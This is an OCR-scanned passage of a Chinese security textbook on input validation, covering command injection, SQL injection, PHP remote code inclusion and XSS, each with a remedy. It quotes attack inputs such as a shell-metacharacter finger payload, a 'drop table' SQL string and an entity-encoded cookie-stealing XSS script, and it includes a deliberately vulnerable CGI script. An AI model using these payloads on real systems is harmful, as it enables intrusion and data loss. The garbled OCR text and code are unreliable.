问题 ， 就 是 没有 提供 任何 方法 限制 转移 到 缓冲 区 可 用 空间 的 数据 的 数量 。 在 10.2 节 中 我 们 已 
经 讨论 了 一 系列 与 阻止 缓冲 区 溢出 相关 的 安全 程序 设计 实践 。 
针对 缓冲 区 溢出 编写 安全 的 程序 代码 需要 有 一 种 心态 ， 就 是 认为 任何 输入 都 存在 危险 ， 在 
处 理 输入 时 不 要 使 程序 面临 危险 。 关 于 输入 的 长 度 ， 当 前 的 解决 办 法 就 是 使 用 动态 缓冲 区 确保 
有 足够 的 有 效 空 间 ， 或 者 把 输入 数据 处 理 成 缓冲 区 长 度 的 数据 块 。 即 使 使 用 动态 缓冲 区 ， 程 序 
员 也 一 定 要 细心 处 理 ， 保 证 请 求 的 空间 不 会 超出 内 存 可 用 的 范围 。 一 旦 超出 内 存 可 用 的 范围 ， 
程序 必须 能 够 很 好 地 处 理 这 个 错误 。 这 可 能 会 涉及 在 缓冲 区 块 中 处 理 输 入 、 抛 弃 多 余 的 输入 、 
中 断 程 序 ， 或 者 任何 其 他 的 合理 啊 应 异常 状态 的 动作 。 这 些 检 查 必 须 应 用 到 任何 地 方 的 数据 ， 
只 要 这 个 数据 的 值 是 需要 程序 处 理 的 或 者 未 知 输入 的 。 它 们 也 必须 应 用 到 所 有 潜在 的 输入 源 。 


11.2.2 ”程序 输入 的 解释 


程序 输入 的 另 一 个 需要 关注 的 问题 是 它 的 含义 和 解释 。 总 的 来 说 ， 程 序 输入 数据 可 分 为 文 
本 和 二 进 制 两 种 形式 。 当 处 理 二 进 制 数据 时 ， 程 序 假定 将 未 经 加 工 的 一 些 二 进 制 数据 解释 为 整 
数 、 浮 点 数 、 字 符 串 或 者 其 他 一 些 更 复杂 结构 的 数据 。 当 读 和 二进制 数据 时 ， 这 些 假设 的 解释 
必须 进行 验证 ， 如 何 进行 处 理 的 细节 很 大 程度 上 取决 于 信息 编码 的 特殊 解释 。 例 如 ， 在 以 太 网 
Wi, IP QA TCP 段 中 网 络 协 议 使 用 的 复杂 的 二 进 制 结构 ， 其 中 的 网 络 代 码 必须 细致 编写 和 验 
W. ERNE, DNS, SNMP, NFS 和 其 他 的 协议 都 使 用 二 进 制 编码 ， 对 在 使 用 这 些 协 议 
的 各 方 之 间 发 出 的 请 求 和 响应 也 要 进行 二 进 制 编码 。 这 些 协 议 经 背 使 用 一 些 抽象 语法 语言 来 说 
明 ， 因 而 任何 指定 的 值 都 必须 按照 这 个 规范 进行 验证 。 

2014 年 爆 出 的 心脏 出 血 (HeartBleed) OpenSSL 漏洞 (还 将 在 22.3 节 进 一 步 讨 论 )， 就 是 没 
有 正确 检查 二 进 制 输入 值 的 有 效 性 的 一 个 例子 。 因 为 一 个 编程 错误 ， 这 个 错误 未 能 对 请 求 中 期 
望 返回 的 数据 量 和 实际 提供 的 数据 量 进 行 检 查 ， 使 得 攻击 者 有 了 访问 临近 的 内 存 地 址 的 机 会 ， 
其 中 可 能 存储 着 如 用 户 名 、 密 码 、 私 铀 和 其 他 一 些 敏感 信息 。 这 些 漏洞 潜在 地 威胁 了 很 多 的 服 
务 右 和 它们 的 用 户 。 这 就 是 缓冲 区 越界 读 取 的 一 个 例子 。 

一 般 而 言 ， 程 序 将 文本 数据 当 作 程序 输入 进行 处 理 。 依 据 某 些 字 符 集 ， 未 经 加 工 的 二 进 
制 数据 被 解释 为 字符 。 通 常 假设 的 字符 集 是 ASC 字符 集 ， 尽 管 常用 的 系统 ， 像 Windows 和 
MacOS， 都 是 使 用 带 重音 字符 的 不 同 的 扩展 字符 集 。 随 着 程序 的 使 用 越 来 越 国际 化 ， 在 程序 中 将 会 
使 用 越 来 越 多 的 字符 集 。 程 序 员 必须 仔细 识别 使 用 的 是 哪个 字符 集 ， 以 及 正在 读 和 的 是 哪些 字符 。 

除了 识别 输入 是 什么 字符 之 外 ， 更 重要 的 是 确定 它们 的 含义 。 它 们 可 以 表示 一 个 整数 或 者 
一 个 浮 点 数 。 它 们 也 可 能 是 一 个 文件 名 、 一 个 URL 地 址 、 一 个 电子 邮件 地 址 或 者 一 些 形 式 的 标 
识 符 。 在 使 用 这 些 输入 之 前 ,程序 员 也 许 有 必要 确认 键入 的 数据 是 否 真正 代表 了 期 望 的 数据 类 
型 。 任 何 失误 都 会 导致 程序 出 现 漏洞 ， 而 漏洞 又 给 了 攻击 者 可 乘 之 机 ， 从 而 造成 严重 的 后 果 。 

为 了 说 明文 本 型 输入 数据 的 解释 问题 ， 我 们 首先 讨论 一 般 类 型 的 注入 攻击 ， 它 是 由 于 验证 
输入 的 解释 失败 而 造成 的 。 接 下 来 ,我 们 回顾 一 些 使 用 各 种 字符 集 输入 时 数据 的 验证 机 制 和 国 
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际 化 输入 处 理 所 使 用 的 机 制 。 

注入 攻击 ”注入 攻击 (injection attack) 这 个 术语 涉及 多 种 与 输入 数据 无 效 处 理 相 关 的 程 
序 缺 陷 ， 特 别 是 当 程 序 输入 数据 有 意 或 者 无 意 间 影响 到 程序 的 执行 流 的 时 候 ， 这 个 问题 就 发 
生 了 。 有 很 多 种 机 制 能 够 引起 它 的 发 生 ， 最 常见 的 一 种 是 ， 当 输入 数据 作为 一 个 参数 传递 给 
系统 上 的 男 一 个 辅助 程序 的 时 候 ， 原 来 的 程序 会 接着 处 理 和 使 用 它 的 输出 。 当 使 用 像 Perl、 
PHP, Python, sh 和 很 多 其 他 的 脚本 语言 进行 程序 开发 时 ， 上 述 情 况 是 经 党 出 现 的 ， 这 些 语 
言 鼓励 对 其 他 存在 的 程序 和 一 些 可 能 保存 编码 的 系统 工具 重复 使 用 。 过 去 这 些 语 言 可 能 经 稼 
在 一 些 系 统 上 开发 某 些 应 用 。 现 在 ， 在 Web CGI 脚本 中 经 常 使 用 它们 处 理 HTML 表单 提供 
的 数据 。 

我 们 考虑 图 11-2a 中 显示 的 一 个 Perl CGI 脚本 。 一 个 指定 的 用 户 使 用 UNIX finger 命令 返 
回 一 些 基本 的 细节 ， 这 个 脚本 放 在 Web 服务 硕 一 个 适当 的 位 置 ， 调 用 这 个 脚本 能 够 啊 应 一 个 
简单 的 表单 ， 如 图 11-2b 所 示 。 通 过 在 服务 器 系统 上 运行 一 个 程序 ， 返 回程 序 的 输出 ， 如 果 有 
必要 在 一 个 HTML Web 页 里 对 输出 的 内 容重 新 进行 适当 的 格式 化 ， 这 个 脚本 就 能 从 服务 器 上 
取 回 想 要 得 到 的 信息 。 这 个 类 型 的 表单 和 相关 的 处 理 程序 都 很 常见 ， 经 常 作 为 编写 和 使 用 CGI 
脚本 的 简单 例子 。 非 常 不幸 的 是 ， 这 个 脚本 存在 一 个 致命 的 漏洞 ， 用 户 输入 的 值 作 为 一 个 参数 
直接 传递 给 finger 程序 。 如 果 提 供 的 是 一 个 合法 用 户 的 标识 符 ， 例 如 ljpb， 接 下 来 将 会 输出 这 
个 用 户 的 信息 ， 如 图 11-2c 第 一 部 分 所 示 。 然 而 ， 如 果 攻 击 者 提供 一 个 值 ， 其 中 包括 shell 元 
字符 9 (meta-character)， 例 如 ，xxx ; echo attack success; ls -lfinger* ， 接 下 来 输出 的 信息 就 是 
图 11-2c 后 一 部 分 显示 的 内 容 。 利 用 Web 服务 器 的 特权 ， 攻 击 者 能 够 运行 系统 上 任何 一 个 程 
序 ， 在 这 个 例子 中 除了 提供 一 个 用 户 标 识 以 外 ， 另 外 的 两 条 命令 正好 显示 一 条 信息 并 且 列 出 
Web 目录 下 的 一 些 文件 。 但 是 任何 命令 都 可 以 被 使 用 。 

这 就 是 一 个 命令 注入 ( command injection) 攻击 ， 因 为 使 用 的 输入 数据 可 以 建立 一 个 命令 ， 
随后 通过 拥有 Web 服务 器 特权 的 系统 执行 这 个 命令 。 这 说 明 问 题 的 产生 是 由 于 没有 对 输入 的 
数据 进行 充分 检查 。 而 脚本 设计 者 主要 关心 能 够 给 一 个 正在 存在 的 系统 工具 提供 Web 访问 。 
其 所 希望 提供 的 输入 是 一 些 用 户 名 或 者 登录 标识 ， 正 如 当 系 统 上 的 一 个 用 户 运行 fnger 程序 时 
那样 。 这 样 的 用 户 能 够 清楚 地 提供 一 些 数 据 值 进 行 命令 注入 攻击 ， 利 用 他 们 已 经 获得 的 特权 随 
意 运 行程 序 。 只 要 提供 了 Web 界面， 安全 问题 就 可 能 会 出 现 ， 因 为 此 时 Web 服务 器 的 特权 程 
序 正在 运行 ， 但 却 使 用 了 一 个 未 知 的 外 部 用 户 提 供 的 参数 。 

为 了 应 对 这 种 攻击 ， 程 序 员 需 要 明确 识别 有 关 输 入 形式 的 任何 假设 ， 在 使 用 数据 之 前 验 
证 这 些 数据 与 其 假设 是 否 一 致 。 验 证 的 时 候 通 笛 将 输入 的 数据 与 描述 假设 形式 的 模式 进行 比 
较 ， 一 旦 测试 失败 就 拒绝 该 输入 。 后 面 将 讨论 模式 匹配 。 在 图 11-2d 中 ， 对 存在 漏洞 的 
finger CGI 脚本 进行 了 一 个 适当 的 扩展 。 它 增加 了 一 个 检验 确保 用 户 输入 的 内 容 只 包括 字母 
和 数字 ， 如 果 不 是 这 样 ， 脚 本 就 会 用 一 个 特殊 的 错误 信息 中 断 ， 这 个 错误 信息 将 会 指出 输入 
数据 包含 非法 字符 98。 我 们 注意 到 ， 在 这 个 例子 中 使 用 的 是 Perl， 实 际 上 使 用 任何 语言 编写 
的 CGI 程序 都 会 出 现 该 类 型 的 错误 。 所 有 语言 都 会 检查 输入 与 假设 形式 是 否 匹 配 ， 但 是 解 
决 的 细节 是 不 同 的 。 

另 一 种 广泛 使 用 的 注入 攻击 是 SQL 注入 (SQL injection)。 在 这 种 攻击 中 ， 由 用 户 提供 的 
输入 数据 可 以 建立 一 个 SQL 请 求 ， 从 数据 库 取 回 一 些 信息 。 图 11-3a 是 从 一 个 CGI 脚本 里 摘 


录 的 PHP 代码 ， 我们 把 一 个 名 字 当 作 输 入 提供 给 脚本 ， 这 个 名 字 从 一 个 如 图 11-2b 所 示 的 表 


O shell 元 字符 用 于 分 离 或 组 合 多 个 命令 。 在 这 个 例子 中 ,“;” 分隔 开 各 个 不 同 的 命令 ， 这 些 命令 可 以 按照 顺序 运行 。 
日 ”并 不 建议 使 用 die 中 断 一 个 Perl CGI。 在 这 个 例子 中 ， 是 为 了 简短 才 使 用 的 。 然 而 ， 一 个 好 的 设计 脚本 应 该 
显示 一 个 关于 这 个 问题 的 更 多 有 益 的 错误 信息 ， 并 提示 用 户 返 回 并 改正 输入 数据 。 
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单字 段 中 读 取 ， 使 用 这 个 值 建 立 一 个 请 求 ， 从 数据 库 中 取出 与 该 姓名 相关 的 记录 。 这 段 代 码 的 
漏洞 与 前 面 的 命令 注入 例子 非常 类 似 ， 它 们 之 间 的 不 同 仅 仅 在 于 SQL 注入 利用 SQL 元 字符 ， 
而 命令 注入 利用 shell 元 字符 。 如 果 输 入 一 个 适当 的 姓名 ， 例 如 ，Bob， 接 下 来 代码 就 会 按照 设 
想 的 目的 开始 运行 ,返回 与 Bob 相关 的 数据 库 记 录 。 然 而 ， 如 果 输 入 元 字符 “Bob'; drop table 
suppliers ”， 那 么 运行 结果 将 返回 特定 的 数据 库 记 录 ， 但 是 接着 将 删除 整个 表 ! 对 之 后 的 用 户 
来 讲 ， 这 是 一 个 相当 不 地 的 结果 。 为 了 阻止 这 类 攻击 ， 所 有 输入 在 使 用 之 前 必须 进行 验证 ， 任 
何 元 字符 必须 清除 ， 消 除 它们 的 影响 ， 或 者 完全 拒绝 元 字符 输入 。 目 前 人 们 已 经 普遍 认识 到 
SQL 注入 攻击 的 危害 ,在 CGI 脚本 中 使 用 的 很 多 程序 语言 都 包含 一 些 图 数 ， 它 们 能 够 对 包含 
在 一 个 SQL 请 求 中 的 任何 输入 进行 无 害处 理 ， 去 除 有 害 代 码 。 图 11-3b 中 显示 的 代码 说 明 使 
用 一 个 适当 的 PHP 图 数 能 够 纠正 这 个 漏洞 。 为 了 使 SQL 语句 更 加 安全 ， 最 近 的 报告 推荐 使 用 
SQL 占 位 符 或 者 参数 来 安全 编写 SQL 语句 ， 而 非 直 接 将 键 值 连接 起 来 。 结 合 存储 过 程 的 使 用 ， 
这 种 方法 可 以 使 代码 更 具 鲁 棒 性 和 安全 性 。 


2 #!/usr/bin/perl : ale 
24 finger.cgi 一 finger. CGI script using Perl5 CGI module o 


4 use CGI; g 
use CGI::Carp qw(fatalsToBrowser) ; 
$q = new CGI; # create query object 


# display HTML header 
‘print $q->header, 
LO $q->start_html (‘Finger User'), 
1 $q->hl1('Finger User’); 
print "<pre>"; 


# get name of user and display their finger details 
5 $user = $q->param ("user"); 
print `/usr/bin/finger -sh $user’; 


8 # display HTML footer 
print "</pre>"; 
print $q->end_html; 





a) 不 安全 的 Perl ager CGI 脚本 


<html><head><title>Finger User</title></head><body> 
<hi>Finger User</h1> | , 

<form method=post action="finger.cgi"> 

<b>Username to finger</b>: <input type=text name=user value=""> 
<p><input type=submit value="Finger User"> 
</form></body></html> 





b) finger 表单 


Finger User 
Login Name TTY Idle Login Time Where 
lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine 
ger User 
attack success 
-rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi 
-rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html 


c) 预期 的 、 受 到 破坏 的 finger CGI 的 响应 


14 # get name of user and display their finger details 
15 $user = $q->param("user") ; 





16 die "The specified user contains illegal oae erori 
17 unless ($user =~ /^\w+$/); 
18 print ~/usr/bin/finger -sh $user’; 


d) Perl finger CGI 脚本 的 安全 扩展 
图 11-2 Web CGI 注入 攻击 
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| $name = $_REQUEST['name' Jee | 
$query = "SELECT * FROM suppliers WHERE name = nm , 
| mysql_real_escape_string ($name) . 113a; 

$result = mysql_query ($query) ; 


D EA PP fS 





图 11-3 SQL 注入 实例 


第 三 种 广泛 使 用 的 攻击 是 代码 注入 (code injection) 攻击 ， 在 这 种 攻击 中 ， 提 供 的 输入 包 
含 被 攻击 的 系统 能 够 运行 的 代码 。 在 第 10 章 中 ， 我 们 讨论 的 很 多 缓冲 区 溢出 的 例子 都 包含 代 
码 注入 。 在 那些 情形 下 ， 对 一 个 特殊 的 计算 机 系统 来 说 注入 的 代码 是 二 进 制 机 器 语言 。 然 而 ， 
将 脚本 语言 代码 注入 能 够 远程 运行 的 脚本 中 也 是 值得 关注 的 问题 。 图 11-4a 中 列 出 一 个 有 漏洞 
的 PHP 日 志 脚 本 的 开始 几 行 ， 漏 洞 的 产生 是 由 于 使 用 一 个 变量 构造 了 一 个 文件 名 ， 这 个 文件 
随后 将 被 包含 到 该 脚本 中 。 我 们 注意 到 ， 这 个 脚本 并 不 是 被 直接 调用 ， 相 反 ， 它 只 是 一 个 大 的 
多 文件 程序 的 一 部 分 。 主 脚本 设置 了 变量 $path 的 值 ， 该 变量 的 值 是 包括 这 个 程序 、 所 有 代码 
和 数据 文件 的 主要 路 径 。 在 程序 其 他 地 方 使 用 这 个 变量 意味 着 仅 需 要 改变 几 行 来 定制 安装 这 个 
程序 。 令 人 遗憾 的 是 ， 攻 击 者 并 不 遵守 这 条 规则 。 因 为 一 个 脚本 没有 设计 成 被 直接 调用 的 形式 
并 不 能 说 明 它 无 法 被 直接 调用 。 在 Web 服务 器 上 ， 为 了 阻止 直接 调用 ， 必 须 配置 访问 保护 以 
阻止 直接 访问 。 否 则 ， 如 果 对 这 个 脚本 的 直接 访问 与 PHP 的 其 他 两 行 语 句 结合 ， 就 可 能 造成 
严重 的 攻击 。 首 先 ，PHP 将 原来 在 HTTP 请 求 中 提供 的 任何 输入 变量 的 值 分 配给 同名 的 全 局 
变量 ， 一 个 毫 无 经 验 的 程序 员 可 以 很 容易 地 编写 这 种 表单 处 理 程 序 。 不 幸 的 是 ， 没 有 办 法 对 脚 
本 仅 限 制 它 期 望 的 字段 ， 因 而 一 个 用 户 能 够 为 任意 一 个 期 望 的 全 局 变量 随意 指定 一 些 值 ， 这 
些 值 能 够 被 传递 给 脚本 。 在 这 个 例子 中 ， 变 量 $path 不 是 一 个 表单 字段 ，PHP 的 第 二 行 是 一 个 
include 命令 ， 它 不 仅 能 包含 本 地 文件 ， 而 且 如 果 提 供 了 一 个 URL， 那 么 可 以 包含 源 自 网 络 上 
任何 地 方 的 源 代码 。 综 上 所 述 ， 利 用 一 个 与 图 11-4b 相似 的 请 求 就 可 以 实现 代码 注入 攻击 。 这 
就 导致 变量 $path 包含 一 个 文件 的 URL， 这 个 文件 是 攻击 者 的 PHP 代码 。 同 时 变量 $path 也 能 
定义 男 一 个 变量 $cmd， 它 告诉 攻击 者 的 脚本 可 以 运行 什么 命令 。 在 这 个 例子 中 ， 附 加 的 命令 
可 以 非常 简单 地 列 出 当前 路 径 下 的 所 有 文件 。 然 而 ， 这 个 命令 也 可 以 是 Web 服务 器 上 的 任何 
命令 ， 只 要 拥有 特权 就 能 运行 。 这 种 特殊 类 型 的 攻击 就 是 一 个 PHP 远程 代码 注入 (remote code 
injection)。 最 近 的 报告 指出 ， 许 多 的 PHP CGI 脚本 容易 受到 这 种 类 型 的 攻击 ， 攻 击 者 利用 它 
频繁 进行 攻击 。 





by TTP ASER 
图 11-4 PHP 代码 注入 实例 


有 一 些 防御 方法 可 以 有 效 阻止 这 种 类 型 的 攻击 。 最 明显 的 方法 是 ， 阻 止 将 表单 字段 的 值 
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分 配给 全 局 变量 。 原 本 这 些 值 存储 在 一 个 数组 中 ， 并 且 必 须 通 过 名 字 取 出 ， 这 种 行为 在 图 11-3 
的 代码 中 已 经 说 明 。 对 所 有 新 版 本 的 PHP 来 说 这 是 默认 的 。 这 个 方法 的 不 足 之 处 在 于 ， 它 会 
中 新 使 用 以 前 版 本 编写 的 PHP 代码 ， 而 修改 这 些 代 码 需 要 程序 员 付 出 相当 多 的 努力 。 尽 管 如 
此 ， 这 仍然 是 一 个 首选 ， 除 非 程序 员 能 够 仔细 地 进行 控制 。 该 方法 不 仅 能 够 阻止 这 种 特殊 类 型 
的 攻击 ， 而 且 也 能 阻止 包含 全 局 变量 值 的 处 理 在 内 的 很 多 种 其 他 类 型 的 攻击 。 男 一 个 防御 方法 
是 ， 在 include (和 require) 命令 中 仅 使 用 常量 值 。 它 能 确保 包含 的 代码 真正 源 于 指定 的 文件 。 
如 果 不 得 不 使 用 一 个 变量 ,那么 在 使 用 之 前 必须 立即 进行 仔细 的 验证 。 

还 有 一 些 其 他 的 注入 攻击 ， 包 括 mail 注 人 人、 格式 化 字符 串 (format string) 注入 和 解释 需 
(interpreter) 注入 。 而 且 新 的 注入 攻击 也 在 不 断 被 发 现 。 无 论 何 时 ， 只 要 一 个 程序 调用 一 些 服 
务 ， 而 这 些 服务 来 自 于 另 一 个 程序 、 服 务 或 者 函数 ， 就 可 能 发 生 注 入 攻击 ; 给 一 个 程序 传递 来 
源 于 外 部 的 一 些 不 可 信 、 没 有 进行 充分 检查 和 验证 的 信息 时 ， 也 可 能 发 生 注 和 攻击。 以 上 这 些 
内 容 都 强调 我 们 需要 识别 所 有 的 输入 源 ， 在 使 用 这 些 输入 之 前 验证 所 有 的 假设 情况 ， 以 及 理解 
那些 提供 给 调用 程序 、 服 务 和 函数 的 数据 值 的 含义 和 解释 。 

跨 站 点 脚本 攻击 “” 另 一 大 类 的 漏洞 涉及 这 样 的 情况 : 一 个 用 户 给 程序 提供 输入 ， 而 由 此 产 
生 的 结果 输出 给 另外 一 个 用 户 。 因 为 这 种 攻击 经 常 在 脚本 型 的 Web 应 用 中 看 到 ， 因 此 称 其 为 
跨 站 点 脚本 (cross-site scripting) (XSS 9) 攻击 。 这 个 漏洞 包含 在 用 户 浏览 右 里 显示 的 一 个 Web 
页 的 HTML 内 容 中 包含 的 脚本 代码 中 。 该 脚本 代码 可 能 是 Javascript、ActiveX、VBScript、 
Flash 或 者 用 户 浏 览 需 支持 的 任意 客户 端 脚本 语言 。 为 了 文 持 某 些 Web 应 用 ， 脚 本 代码 需要 访 
问 与 用 户 浏览 融 当 前 显示 的 其 他 Web 页 相关 的 数据 ， 由 于 这 些 数据 明显 增加 了 安全 隐患 ， 浏 
览 器 加 强 了 安全 检查 ， 并 对 这 些 来 源 于 相同 站 点 的 对 页 面 的 数据 访问 进行 了 限制 。 我 们 假设 来 
源 于 一 个 网 站 的 所 有 内 容 都 是 被 同等 信任 的 ， 并且 因此 允许 与 该 站 点 的 其 他 内 容 进 行 交 互 。 

跨 站 点 脚本 攻击 利用 了 这 个 假设 ， 企 图 避 开 浏览 器 的 检查 获得 更 高 权限 ， 然 后 访问 属于 另 
一 个 站 点 的 敏感 数据 。 这 些 数据 可 能 包括 页 面 内 容 、 会 话 cookie 和 各 种 其 他 对 象 。 攻 击 者 可 
以 使 用 各 种 机 制 将 恶意 的 脚本 内 容 注入 通过 目标 站 点 返回 给 用 户 的 Web 页 中 。 这 种 攻击 最 常 
见 的 变 体 是 XSS 反射 (reflection)。 攻 击 者 在 提交 给 站 点 的 数据 中 包含 恶意 的 脚本 代码 ， 如 果 
这 个 内 容 未 经 充分 检查 就 显示 给 其 他 用 户 ， 而 这 些 用 户 假设 这 个 脚本 是 可 以 信任 的 ， 他 们 将 执 
行 这 个 脚本 ， 访 问 与 那个 站 点 相关 的 任何 数据 。 我 们 研究 了 很 多 Web 站 点 广泛 应 用 的 留言 板 
( guestbook program)、 维 基 (wiki) 和 博客 (blog)， 它 们 都 允许 用 户 在 站 点 上 留言 ， 其 他 用 户 随 
后 就 可 以 看 到 这 些 留 言 。 除 非 对 这 些 留言 的 内 容 进 行 检 查 ， 删 除 其 中 和 危险 的 代码 ， 否 则 Web 
站 点 就 有 可 能 受到 攻击 。 

考察 图 11-5a 中 所 示 的 例子 。 如 果 这 些 文本 通过 留言 板 进行 存储 ， 那 么 当 我 们 浏览 一 些 文 
本 时 ， 就 会 执行 其 中 的 JavaScript 代码 。 这 个 代码 可 以 用 攻击 者 的 cookie 脚本 返回 的 信息 代替 
文档 的 内 容 ， 攻 击 者 的 cookie 脚本 是 由 与 这 个 文档 相 联系 的 cookie 提供 的 。 很 多 站 点 ， 在 使 
用 它们 的 功能 之 前 需要 用 户 注册 ， 例 如 使 用 留言 板 。 在 这 种 攻击 中 ,一 个 用 户 的 cookie 被 提 
供给 攻击 者 ， 攻 击 者 在 这 个 站 点 上 就 使 用 cookie 去 冒充 这 个 用 户 。 这 个 例子 用 攻击 者 的 脚本 
返回 的 内 容 非常 明显 地 代替 了 页 面 内 容 。 通 过 使 用 更 复杂 的 JavaScript 代码 ， 攻 击 者 有 可 能 使 
脚本 的 执行 更 加 隐秘 。 

为 了 阻止 这 种 攻击 ， 任 何 用 户 提 供 的 输入 都 要 接受 检查 ， 任 何 危险 代码 都 要 被 删除 
或 者 阻止 执行 。 这 个 例子 看 起 来 很 容易 检查 和 纠 错 ， 但 攻击 者 不 可 能 做 这 么 简单 的 事情 。 
在 图 11-5b 中 显示 了 相同 的 代码 ， 但 是 这 次 所 有 与 脚本 代码 相关 的 字符 都 使 用 HTML 字符 


O 485 XSS 指 跨 站 点 脚本 ， 缩 写 CSS 指 级 联 式 表 单 (cascading style sheet)， 要 注意 进行 区 分 。 
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实体 9 进行 编码 。 当 浏览 器 将 这 些 编码 解释 为 图 11-5a 显示 的 相同 代码 时 ， 在 检查 可 能 的 攻击 
代码 之 前 都 必须 先 将 这 样 的 实体 字符 转换 成 它们 表示 的 字符 。 下 一 节 ， 我 们 将 进一步 讨论 这 些 


369] AF. 


6#46; 64108; &#111; 6499; 6497; GH116; 6#105; &#111; 
&#110; S#61; #39; 64104; &#116; 64116; &#112; 6#58; 
&#47; &H47 7 &F104; 6897; GH99; Et#107; &#101; 64114; 
— &#46; 64119; 6#101; 698; &#46; #115; 6 #105; 64116; 
&#101; &#47; &#99; 6#111; &#111; 64107; &#105; &#101; 
E446; &#99; 6F103; 64105; 6463; 643976443; &#100; 
&#111; 6499; £4117; 64109; 6#1017 #110; &#116; &#46; 
BH99; GHL11; &#1117 64107; 6#105; S101; 6460; 5447; 
#115;&#99; 64114; #105; &#112;&#116; & #62; 
b) 编码 后 的 XSS 实例 
图 11-5 XSS 实例 


XSS 攻击 意味 着 正确 处 理 程 序 输 入 和 输出 的 失败 。 检 查 和 验证 的 失败 导致 程序 存储 的 数 
据 具 有 洪 在 的 危险 。 然 而 ， 攻 击 者 的 目标 并 不 是 这 个 程序 ， 而 是 随后 访问 程序 的 用 户 ， 以 及 用 
户 访问 这 个 程序 所 使 用 的 程序 。 如 果 程 序 中 所 有 可 能 不 安全 的 数据 输出 都 被 清除 ， 那 么 攻击 就 
不 会 发 生 。 在 11.5 节 我 们 将 讨论 对 输出 的 正确 处 理 。 

还 有 很 多 其 他 的 攻击 与 XSS 类 似 ， 包 括 跨 站 点 请 求 伪 造 及 HTTP 响应 分 离 。 而 且 这 些 问 
题 也 多 是 随意 使 用 不 信任 的 、 未 检查 的 输入 引起 的 。 


11.2.3 ”验证 输入 语法 


假定 程序 员 不 能 控制 输入 数据 的 内 容 ， 那 么 在 使 用 这 些 数据 之 前 就 有 必要 确保 这 些 数 据 与 
对 数据 的 假设 一 致 。 如 果 数 据 是 文本 类 型 的 ， 那 么 假设 的 输入 内 容 可 以 是 仅 包含 可 打印 字符 的 
数据 ， 其 中 有 明显 的 HTML 标记 ， 它 们 可 以 是 一 个 人 的 名 字 、 一 个 用 户 的 这、 一 个 电子 邮件 
地 址 、 一 个 文件 名 或 一 个 URL。 这 些 数据 也 可 能 代表 一 个 整数 或 者 其 他 数值 。 一 个 程序 在 使 
用 这 些 输入 的 时 候 ， 需 要 确认 它 是 否 满足 这 些 假 设 。 输 入 的 数据 一 定 要 与 输入 假设 进行 比较 ， 
仅 接 受 有 效 的 输入 ， 这 是 一 个 重要 的 原则 。 男 一 个 原则 是 将 输入 的 数据 和 已 知 的 危险 数据 进行 
比较 。 但 是 采用 这 种 方法 也 会 出 现 问 题 ， 那 就 是 不 断 发 现 的 新 问题 和 新 方法 还 是 可 以 避 开 已 经 
存在 的 检查 的 。 通 过 试图 阻止 已 知 的 危险 输入 数据 ， 攻 击 者 采用 新 的 编码 依然 可 以 成 功 发 起 攻 
击 。 程 序 仅 接受 已 知 的 安全 数据 ， 才 更 有 可 能 保持 安全 。 

这 类 比较 通常 采用 正则 表达 式 (regular expression) 完成 。 程 序 员 可 以 明确 地 对 其 进行 编 
码 ， 也 可 以 将 它 包 含 在 一 个 提供 的 输入 处 理 例 程 中 。 图 11-2d 和 图 11-3b 给 出 这 两 种 方法 的 例 
子 。 正 则 表达 式 是 由 一 系列 描述 允许 的 输入 变化 的 字符 构成 的 模式 。 在 正则 表达 式 中 的 一 些 字 
符 是 逐个 处 理 的 ， 与 它们 进行 比较 的 输入 数据 必须 包含 那些 字符 。 其 他 的 一 些 字符 有 特殊 的 含 
义 ， 可 以 是 各 种 字符 集 的 详细 说 明 、 字 符 的 分 类 以 及 重复 的 字符 。 正 则 表达 式 的 内 容 和 用 法 的 
详细 信息 在 不 同 的 语言 中 是 不 同 的 ， 在 使 用 的 时 候 需 要 考虑 是 哪 种 语言 的 使 用 方法 。 





O HTML 字符 实体 允许 字符 集中 的 任何 字符 使 用 编码 形式 。 例 如 ，&#60 代表 字符 “< ”。 
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如 果 输 入 的 数据 比较 失败 ， 那 么 就 会 遭 到 拒绝 。 这 时 ， 一 个 适当 的 错误 信息 将 发 送 到 输入 
源 ， 人 允许 用 户 改正 或 者 重新 输入 。 程 序 也 可 以 改变 输入 数据 再 进行 确认 ， 经 常 是 避 开 元 字符 ， 
避免 任何 特殊 的 解释 ， 从 而 保证 输入 的 安全 。 

图 11-5 进一步 说 明了 输入 数据 多 重 编码 的 问题 。 发 生 这 个 问题 是 因为 数据 在 HTML 中 或 
者 在 一 些 其 他 结构 化 的 编码 中 允许 字符 的 多 重 表 示 。 一 些 字符 集 编码 包括 相同 字符 的 多 重 编 
码 ， 同 样 也 会 发 生 这 个 问题 。Unicode 和 UTF-8 编码 就 能 非常 明白 地 说 明 这 个 问题 。 传 统 方式 
上 ,计算 机 程序 员 假 设 使 用 一 个 常见 的 单一 字符 集 ， 在 很 多 情况 下 就 是 ASCII 字符 集 ， 这 个 
7 位 的 字符 集 包 括 所 有 英文 大 小 写字 母 、 数 字 和 标点 符号 ， 还 包括 在 计算 机 和 数据 通信 应 用 中 
很 多 常见 的 控制 字符 。 然 而 ， 它 不 能 表示 许多 欧洲 语言 使 用 的 其 他 带 重 音 的 字符 ， 也 不 能 表示 
像 汉 语 和 日 语 使 用 的 大 量 的 字符 。 而 支持 全 球 用 户 使 用 自己 的 语言 进行 交流 的 需求 正在 不 断 增 
长 。 目 前 广泛 使 用 的 Unicode 字符 集 支 持 这 种 需求 ， 它 原本 是 Java 语言 使 用 的 字符 集 ， 也 是 
操作 系统 如 Windows XP 和 其 后 的 版 本 原本 使 用 的 字符 集 。Unicode 字符 集 使 用 16 位 表示 每 一 
个 字符 ， 这 就 提供 了 足够 的 字符 表示 世界 上 大 多 数 的 语言 。 可 是 ， 很 多 程序 、 数 据 库 、 其 他 计 
算 机 和 通信 应 用 采取 8 位 字符 表示 ， 与 ASCI 开始 的 128 个 值 一 致 。 为 了 调节 这 个 差异 ， 一 
个 Unicode 字符 需要 使 用 UTF-8 编码 成 为 一 个 1 至 4 字 节 的 序列 ， 任 何 字符 都 有 一 个 唯一 的 
编码 。 如 果 在 规范 中 我 们 忽略 那些 严格 的 限制 ， 则 常见 的 ASCI 字符 可 以 有 多 重 编码 。 例 如 ， 
一 个 和 斜 杠 字符 “人 ,在 一 个 UNIX 文件 名 里 用 于 分 隔 路 径 ， 在 ASCH 和 UTF-8 中 都 是 十 六 进 
